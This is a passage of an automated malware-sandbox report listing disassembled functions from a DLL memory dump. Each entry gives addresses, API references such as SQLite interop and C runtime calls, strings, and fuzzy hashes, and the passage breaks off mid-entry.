Instruction ID: 6d70d5a2fe359afd81d1e8d0395027a682a2894bb7badd9ac66b330144d3349c
Opcode Fuzzy Hash: ea2129a3eff66618a711d39f0029aa65fb99054376f71f91636a187321f23d88
Instruction Fuzzy Hash: A5A177B0969340CFC725CF18C48199BB7F0FF99304F10499EE8998B215E739EA85CB92

Function 6BC26160 Relevance: 6.2, APIs: 4, Instructions: 225COMMON

Download Yara Rule

APIs

Part of subcall function 6BC1CF40: _memset.LIBCMT ref: 6BC1CF96

_memset.LIBCMT ref: 6BC261B0
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC263A7
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC263B4
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC263E2

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$_memset
String ID:
API String ID: 1480580083-0
Opcode ID: 50ae08dbd0260eabfd6ee5ac8163ac727e8fe1fca5526236fd7bb40ff4ba7855
Instruction ID: 13083d83bdba66b8e65fff5c841dd8ac15a13dcbb43c19bc42516af73a490d37
Opcode Fuzzy Hash: 50ae08dbd0260eabfd6ee5ac8163ac727e8fe1fca5526236fd7bb40ff4ba7855
Instruction Fuzzy Hash: 757112B1A25B128BD700CF68C88171EB7E4BF84718F144678F99597241F739EA09CBE2

Function 6BC10D20 Relevance: 6.2, APIs: 4, Instructions: 188COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC10DF6
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC10E50
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC10F4C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: 1efa8babdefc6b52959b1bed1c3032894939e00059a2f52cffccd0fd75a8ead8
Instruction ID: ff2b4263f26fe30af7d2018415b818419459a44bb2bd6a1fa5b6a4d5687abec7
Opcode Fuzzy Hash: 1efa8babdefc6b52959b1bed1c3032894939e00059a2f52cffccd0fd75a8ead8
Instruction Fuzzy Hash: B961CF70628704CBD721DF29D8817EBB3E4FF45718F004959D8AAE7200FB39AA65DB52

Function 6BC44380 Relevance: 6.2, APIs: 4, Instructions: 161COMMON

Download Yara Rule

APIs

SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC443F7

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I5b914c29cf5a7984.
String ID:
API String ID: 1073210055-0
Opcode ID: 8249eda810380c55acd3e81b868c49910a9604d454c474e6939b67258ddb59a7
Instruction ID: 37a0c677f3105d9f1a5e719bcb4ed8b3957c752f5e813227c66fed9748e60c7c
Opcode Fuzzy Hash: 8249eda810380c55acd3e81b868c49910a9604d454c474e6939b67258ddb59a7
Instruction Fuzzy Hash: CD41D172A2565147D700CE7CD85026A73E5EF82325F344AFAD8A58B781FB39C744C390

Function 6BC43920 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC439E3
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC439EF
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC439F8
SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC43A2A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$I1bf8975e567ea97a.
String ID:
API String ID: 2044891589-0
Opcode ID: 49e50935ca47f46209e74a4d0a87d8ade805faa1e6751b08a37fd5763e197c56
Instruction ID: 34bfa12a9699fe1237bd7bba834b8c9a73f898773aa76ac69442b383ae6c042a
Opcode Fuzzy Hash: 49e50935ca47f46209e74a4d0a87d8ade805faa1e6751b08a37fd5763e197c56
Instruction Fuzzy Hash: E541F571B652114BE714CF69D845B5AB3E4EFC0728F0445B8EC288B292F739DB58C6A1

Function 6BC12000 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000,00000000,6BC8DA3D), ref: 6BC12021
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000,00000000), ref: 6BC1202A
_memset.LIBCMT ref: 6BC12057
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000,00000000,6BC8DA3D), ref: 6BC1219E

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$_memset
String ID:
API String ID: 1480580083-0
Opcode ID: 03e87a08587b3e3be17b733ef12c43c4ed53623ae9bfaa498bb2bcbb084a6016
Instruction ID: 6416a17b8e3ca704e0d27bc81fdf970e9e2a4e603d14edf31743a534e9d189f4
Opcode Fuzzy Hash: 03e87a08587b3e3be17b733ef12c43c4ed53623ae9bfaa498bb2bcbb084a6016
Instruction Fuzzy Hash: 8C5108755146008FCB01CF28C89669A77B4FF86319F6402AAED1C9F205E73AEA46CBD1

Function 6BBF44B0 Relevance: 6.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BBF44DD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BBF44F6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BBF453B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BBF4581

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 8a8be6d94c03d294858e3811aa7f218c2147e5fa2e232e99f0e681bef55b05ce
Instruction ID: 0ba88e005b8679551f4e997648d3dadd2ac4eff5a49f8a79c8b46acbb0d677ac
Opcode Fuzzy Hash: 8a8be6d94c03d294858e3811aa7f218c2147e5fa2e232e99f0e681bef55b05ce
Instruction Fuzzy Hash: B6310F36A101E567F720ADACCE40B9E775DDB81275F2141B7FD149F240E62DD84F8291

Function 6BC3A8F0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC3A902
_calloc.LIBCMT ref: 6BC3A942
_calloc.LIBCMT ref: 6BC3A9A2
_calloc.LIBCMT ref: 6BC3A9F8

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _calloc$I5b4aedd0c04bd151.
String ID:
API String ID: 3636122150-0
Opcode ID: cc4dbbb2e3b6477b3905e97c79deaf9836c4488465a74895b36fccb75d54cc2c
Instruction ID: 9ed25d273fdc13dedbc5781a3a5e7a2074748677fc5e96444f7d95ecf9b430ea
Opcode Fuzzy Hash: cc4dbbb2e3b6477b3905e97c79deaf9836c4488465a74895b36fccb75d54cc2c
Instruction Fuzzy Hash: 9C41F370A157108FCB00CF28D481A19B7A4FFC9354F8681E9ED585F362EB79D9A1CBA1

Function 6BBDF3A6 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6BBDF3DA
__isleadbyte_l.LIBCMT ref: 6BBDF40D
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,?,00000000,?,?,?,00000000,00000000,?), ref: 6BBDF43E
MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,?,00000000,?,?,?,00000000,00000000,?), ref: 6BBDF4AC

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: cef25491efd45cc051e1da12b3ac0da6e393c9a5771e99ab5c46d1fc86f830fd
Instruction ID: 6eb7a3db1ce6bffe3aaf3cbd8636d42c49f9bc416d595ba6734d84102176ebca
Opcode Fuzzy Hash: cef25491efd45cc051e1da12b3ac0da6e393c9a5771e99ab5c46d1fc86f830fd
Instruction Fuzzy Hash: E231B071A082C6EFDB00CF68C8849AE7BB5FF01321F1685A9E4659B190D73DDA81CB51

Function 6BC49B10 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC49B86
_memmove.LIBCMT ref: 6BC49BB2
_memmove.LIBCMT ref: 6BC49BD9
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC49BED

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memmove$I8b0d9e6837e61abc.Iaa0f8e0c251cfd1d.
String ID:
API String ID: 1025806888-0
Opcode ID: d51745d528bad74be4d0aa2c88698d25460473d145f4a2ffb559525094d6c568
Instruction ID: 8f833c1edf97932988b8ab1df29b482b33f458609119a7abd1b50db8bac1dca5
Opcode Fuzzy Hash: d51745d528bad74be4d0aa2c88698d25460473d145f4a2ffb559525094d6c568
Instruction Fuzzy Hash: D43103B1A10A219FC324CF68C880E15B3B4FF4975871402A9E8568B646F7F9E750CBE0

Function 6BBDB4D8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6BBDB4FE

Part of subcall function 6BBDB32A: __fltout2.LIBCMT ref: 6BBDB355

__cftog_l.LIBCMT ref: 6BBDB524
__cftoe_l.LIBCMT ref: 6BBDB556

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 92e15722c6566b6869c9e246c9abad5c9897cfa1421b2c5b6b48cc2f00d85e78
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 2D114C7244418ABBCF225E94CC52CEE3F63FB19359B548955FF2859030D73ACAB1AB81

Function 6BC2ADA0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 416COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC2B05F

Strings

BINARY, xrefs: 6BC2AF3B
out of memory, xrefs: 6BC2B13B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: BINARY$out of memory
API String ID: 2102423945-3971123528
Opcode ID: 7b0173a30cf42c068b35ba5112526a9b98610ec10e570a280a143e384f95f1ba
Instruction ID: 962b530e5d7931a18eadbfef828b2c8c6f380ad639cd289709eda99576cc0ea9
Opcode Fuzzy Hash: 7b0173a30cf42c068b35ba5112526a9b98610ec10e570a280a143e384f95f1ba
Instruction Fuzzy Hash: B0F1B1B0E2524ADFDB04CF54C4817AEBBB1FF89714F148199E8559B351E338EA92CB90

Function 6BC17930 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 318COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC17AE8

Strings

d, xrefs: 6BC1799B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: d
API String ID: 2102423945-2564639436
Opcode ID: 8b59fcf09db311f0ce088185956513a3837cf348b7f7558804e5668bf4379c82
Instruction ID: 5e07f620d08a72549de69dbec7bb08ce4c81dbb8cada87af01c78a5ff304c1d4
Opcode Fuzzy Hash: 8b59fcf09db311f0ce088185956513a3837cf348b7f7558804e5668bf4379c82
Instruction Fuzzy Hash: 06C1F8B1A1D2518FC304CF28C49071ABBE1FF84314F15869EE8A8AB341E739EA55DBD1

Function 6BC1C450 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 234COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC1C69E
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC1C6B8

Strings

, xrefs: 6BC1C517

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-3916222277
Opcode ID: 8ad2f8cda4a9115e1285fc627ab65506179d0c4ba17a0e06eb4a5e913246acfd
Instruction ID: 65a3aa3e09f7a707b022d7c4aa38ba088c8063f72dadb7d88e336b132137a4f7
Opcode Fuzzy Hash: 8ad2f8cda4a9115e1285fc627ab65506179d0c4ba17a0e06eb4a5e913246acfd
Instruction Fuzzy Hash: 5F818DB1A183019FD704CF68C880B1BBBE5AFC8714F1545A9F859AF341E778EA41CB92

Function 6BC43020 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC4313A
SI5b914c29cf5a7984.SQLITE.INTEROP(00000000), ref: 6BC431D5

Strings

VUUU, xrefs: 6BC431A3

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I5b914c29cf5a7984._memset
String ID: VUUU
API String ID: 2100956863-2040033107
Opcode ID: b451c0ca1b4edf2e44a2532fda228c7742872f62d48760ffc9a950733bff8036
Instruction ID: d9d8a72f4b936d94c7b8a5716b3b40f99dc3c112018aada92907198037187932
Opcode Fuzzy Hash: b451c0ca1b4edf2e44a2532fda228c7742872f62d48760ffc9a950733bff8036
Instruction Fuzzy Hash: D5817A71A157018FC324CF29C881656F7E1FFC8718F148A6DE899873A1EB39EA55CB81

Function 6BC20090 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC2029A
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC202D0

Strings

@, xrefs: 6BC2016D

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d._memset
String ID: @
API String ID: 1786038377-2766056989
Opcode ID: ca4c71b44898a516d400625f2ab250b8500f7738756cb05a33d8a8bef42c034e
Instruction ID: 5e5491e6e4e3eae98ff679a369b5b337b74c615180989b12d3001a7d652729f0
Opcode Fuzzy Hash: ca4c71b44898a516d400625f2ab250b8500f7738756cb05a33d8a8bef42c034e
Instruction Fuzzy Hash: E581C2B19193128FD705CF28C89065EB7F5FB85314F144A6FE8A897301E739EA45CBA2

Function 6BC4A830 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

SI353770fd94e573c1.SQLITE.INTEROP(?,00000001,00000000,00000000,?,?), ref: 6BC4AA22

Strings

LIKE or GLOB pattern too complex, xrefs: 6BC4A89C
ESCAPE expression must be a single character, xrefs: 6BC4A922

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I353770fd94e573c1.
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 1989827943-264706735
Opcode ID: 5838bea1fe329e40cabc2d7205d51c96663df886c259d40a3bfdd7708523f81e
Instruction ID: c515817f53c0136688f1c648f0dd45ded6ae2fa503a3a92078a825742a1c1396
Opcode Fuzzy Hash: 5838bea1fe329e40cabc2d7205d51c96663df886c259d40a3bfdd7708523f81e
Instruction Fuzzy Hash: 8C512471A293519FD7048F29C481B5AB7A0EBC5324F0546A9F8B48B386F738DB85C7A1

Function 6BC064F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC0656B
_memset.LIBCMT ref: 6BC06625

Strings

0, xrefs: 6BC0653C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
